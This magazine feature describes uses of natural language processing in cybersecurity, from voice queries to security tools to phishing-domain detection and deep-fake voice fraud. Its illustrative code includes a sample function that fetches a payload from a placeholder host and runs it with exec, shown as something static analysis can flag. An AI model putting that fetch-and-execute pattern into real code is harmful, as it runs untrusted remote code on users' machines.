Security & Risk

A new voice for cybersecurity

How natural language processing can help solve critical security challenges

NLP Security
  • 40% of large enterprises plan to adopt voice UIs in the next two years
  • Emerging NLP applications can help speed up threat detection and patch rollouts
  • Deep-fake voice UIs are an emerging security threat

Artificial intelligence is spreading quickly across the enterprise: AI applications are now part of the technology stack at 45% of companies with 1,000 or more employees, according to a recent survey.

One of the most promising AI applications is the voice assistant—software with natural language processing (NLP) capabilities that allow computers to understand spoken and written language. Nearly 4 in 10 enterprises plan to implement some form of voice UI in the next two years, according to 451 Research. That’s on top of the fast-growing consumer market for the technology: By 2023, people will be talking to nearly 8 billion digital voice assistants, according to Juniper Research.

While no case studies yet exist for NLP applications in cybersecurity, compelling applications are starting to emerge. Many CISOs are hoping these assistants will help security teams with basic patch maintenance and other critical needs. NLP promises to make cybersecurity tools easier to use. It should also help harden code, enable faster and more accurate threat detection, and provide insights into the minds of attackers.

“Security analysts have so much to focus on, so the ability to search is key,” says Chris Peake, global senior director of information security at ServiceNow, Workflow’s publisher. “Intelligent systems that leverage NLP and machine learning can help improve our awareness of the security environment, in the same way that a consumer voice assistant like Alexa can tell us the weather because it knows where we are.”

Here’s a look at some of the potential payoffs of NLP for cybersecurity.

Faster queries

The most basic role NLP and AI can play in fighting cybercrime will be powering a voice interface for existing security tools. Just as you might ask Alexa or Siri for a weather report or directions to the airport, security pros will be querying their security information and event management systems (SIEMs) by speaking instead of typing or tapping.

Some IT teams are already doing this in areas such as Wi-Fi management, where network managers troubleshoot issues using verbal queries, such as: “Do we have any failed connections?” or “Why is the network slow today?” For security analysts, NLP may soon enable similar requests: “Are there any alerts that require human review?” or “Did the patch rollout succeed last night?”

Understanding the unique data formats, APIs, and proprietary query languages used by modern security tools is more challenging than translating simple spoken language. But by simplifying the query process, NLP could lower barriers to entry in the profession and help alleviate the increasing shortage of skilled security personnel.
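To make the idea concrete, here is a minimal sketch of how a transcribed question might be mapped to a structured query. It assumes simple keyword matching, which is far cruder than a real NLP pipeline, and the intent table, the `to_query` helper, and the field names such as `source` and `filter` are all hypothetical rather than taken from any actual SIEM product.

```python
import re

# Hypothetical intent table: trigger keywords paired with a structured query.
# The schema ("source", "filter") is illustrative, not a real SIEM API.
INTENTS = [
    ({"alerts", "review"},
     {"source": "alerts", "filter": {"needs_human_review": True}}),
    ({"patch", "rollout"},
     {"source": "patch_jobs", "filter": {"window": "last_night"}}),
    ({"failed", "connections"},
     {"source": "wifi_sessions", "filter": {"status": "failed"}}),
]


def tokenize(utterance):
    """Lowercase the utterance and return its set of alphabetic words."""
    return set(re.findall(r"[a-z]+", utterance.lower()))


def to_query(utterance):
    """Return the query for the first intent whose keywords all appear,
    or None when no intent matches."""
    words = tokenize(utterance)
    for keywords, query in INTENTS:
        if keywords <= words:  # every trigger keyword is present
            return query
    return None


if __name__ == "__main__":
    print(to_query("Are there any alerts that require human review?"))
    print(to_query("Did the patch rollout succeed last night?"))
    print(to_query("Why is the network slow today?"))
```

A production system would replace the keyword table with a trained language model and translate the result into each tool's own query language, which is where most of the difficulty described above lies.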


“NLP can help address the staffing shortages by making it easier to enter the security industry, and simultaneously improve users’ ability to quickly leverage and derive value from the tools they use every day,” says Pravin Kothari, CEO of data security firm CipherCloud.

More secure code

Once computers start to understand human syntax and the context in which it’s used, they can look for patterns within large data sets that would be difficult if not impossible for humans to detect. That has a number of potential security applications, says Eliezer Kanal, technical manager for cybersecurity foundations at Carnegie Mellon’s Software Engineering Institute.

For example, computers can use NLP to analyze reams of system documentation and flag potential vulnerabilities far more rapidly than a person can. NLP can also be used to debug code and make it more secure. Using source code that has already been vetted, “organizations can train a machine learning model to identify deviations from that code and suggest cleaner versions of it,” says Kanal.

Cleaner code usually results in fewer bugs, he adds, and limiting the number of bugs within an application reduces the number of potential vulnerabilities an attacker could exploit.

Faster threat detection

One big challenge with threat detection is the need to analyze vast amounts of unstructured threat data. Computers were built for such large-scale, highly repetitive tasks, but first they need to understand what they’re looking at.

Some companies are using NLP to discover malicious language hidden inside otherwise benign code. By breaking code into discrete parts of speech and understanding how one part relates to another, researchers can treat subroutines as “sentences,” allowing them to uncover how a particular segment of code functions without the need to execute and analyze it.
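As a rough illustration of inspecting code without running it, the sketch below parses a snippet into a syntax tree and lists the functions each subroutine calls. This is plain static parsing with Python's standard `ast` module, a much simpler stand-in for the NLP models described above, and the sample code, the `summarize` helper, and the `fetch` function it mentions are invented for the example.

```python
import ast

# Invented sample: nothing in this string is ever executed.
SAMPLE = '''
def update():
    data = fetch("http://example.invalid/payload")
    exec(data)

def greet(name):
    print("hello", name)
'''


def call_names(func_node):
    """Collect the names of everything called inside one function body."""
    names = []
    for node in ast.walk(func_node):
        if isinstance(node, ast.Call):
            target = node.func
            if isinstance(target, ast.Name):         # plain call: f(...)
                names.append(target.id)
            elif isinstance(target, ast.Attribute):  # method call: obj.f(...)
                names.append(target.attr)
    return names


def summarize(source):
    """Map each top-level function name to the sorted calls it makes."""
    tree = ast.parse(source)
    return {
        node.name: sorted(call_names(node))
        for node in tree.body
        if isinstance(node, ast.FunctionDef)
    }


if __name__ == "__main__":
    for name, calls in summarize(SAMPLE).items():
        print(name, "->", calls)
```

Each subroutine is reduced to a short "sentence" of calls, so a reviewer or a model could flag `update` for passing downloaded data to `exec` without ever running it.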

Researchers are also using NLP to identify malicious domain names generated for use in phishing scams. One NLP-based algorithm developed by OpenDNS, called NLP-Rank, analyzes the number and types of edits required to change a legitimate domain into a false one, applying machine learning to identify patterns in how advanced persistent threat (APT) groups create URLs. This information can be used to quarantine network traffic containing the questionable domain names before it reaches anyone’s inbox.
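The notion of counting the edits between a legitimate domain and a fake one can be sketched with classic Levenshtein edit distance. This is not the NLP-Rank algorithm itself, whose details are not given here. It is a textbook technique shown under the assumption that edits are single-character insertions, deletions, and substitutions, and the `edit_script` function and sample domains are hypothetical.

```python
def edit_script(source, target):
    """Return (distance, ops) for turning source into target using
    single-character insert, delete, and substitute operations."""
    rows, cols = len(source) + 1, len(target) + 1
    dist = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        dist[i][0] = i  # delete every character of source[:i]
    for j in range(cols):
        dist[0][j] = j  # insert every character of target[:j]
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if source[i - 1] == target[j - 1] else 1
            dist[i][j] = min(
                dist[i - 1][j] + 1,         # delete
                dist[i][j - 1] + 1,         # insert
                dist[i - 1][j - 1] + cost,  # match or substitute
            )

    # Walk back from the bottom-right corner to recover one optimal edit list.
    ops = []
    i, j = len(source), len(target)
    while i > 0 or j > 0:
        if (i > 0 and j > 0 and source[i - 1] == target[j - 1]
                and dist[i][j] == dist[i - 1][j - 1]):
            i, j = i - 1, j - 1  # characters match, no edit recorded
        elif i > 0 and j > 0 and dist[i][j] == dist[i - 1][j - 1] + 1:
            ops.append(("substitute", source[i - 1], target[j - 1]))
            i, j = i - 1, j - 1
        elif i > 0 and dist[i][j] == dist[i - 1][j] + 1:
            ops.append(("delete", source[i - 1], ""))
            i -= 1
        else:
            ops.append(("insert", "", target[j - 1]))
            j -= 1
    ops.reverse()
    return dist[len(source)][len(target)], ops


if __name__ == "__main__":
    print(edit_script("example.com", "examp1e.com"))
    print(edit_script("paypal.com", "paypall.com"))
```

A detector built on this idea might treat a small distance from a well-known domain, combined with telltale edit types such as swapping a letter for a look-alike digit, as one signal among several. The thresholds and the machine learning layer are left out of this sketch.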

More sophisticated attacks

As with any technology that aids threat detection and vulnerability assessment, NLP can also give attackers an advantage. For example, voice UIs can be used to generate deep-fake conversations that mimic company executives.

The first known case happened last March, when the CEO of a UK-based energy firm was scammed out of nearly $250,000 by attackers using AI-based voice spoofing to stage a phone conversation with his boss, the chief executive of his firm’s German parent company.

The same social engineering techniques can be used to bypass physical security precautions. Imagine a security guard who receives a phone call from a voice he trusts, telling him the person at the front gate is approved for entry.

Unfortunately, the burden is still on humans to detect these new types of attacks. “It’s generally easier for computers to generate language than to detect machine-generated language,” says Paul Bischoff, a privacy advocate with Comparitech. “Humans are still better at detecting fakes than computers. The problem is we can’t do it at scale.”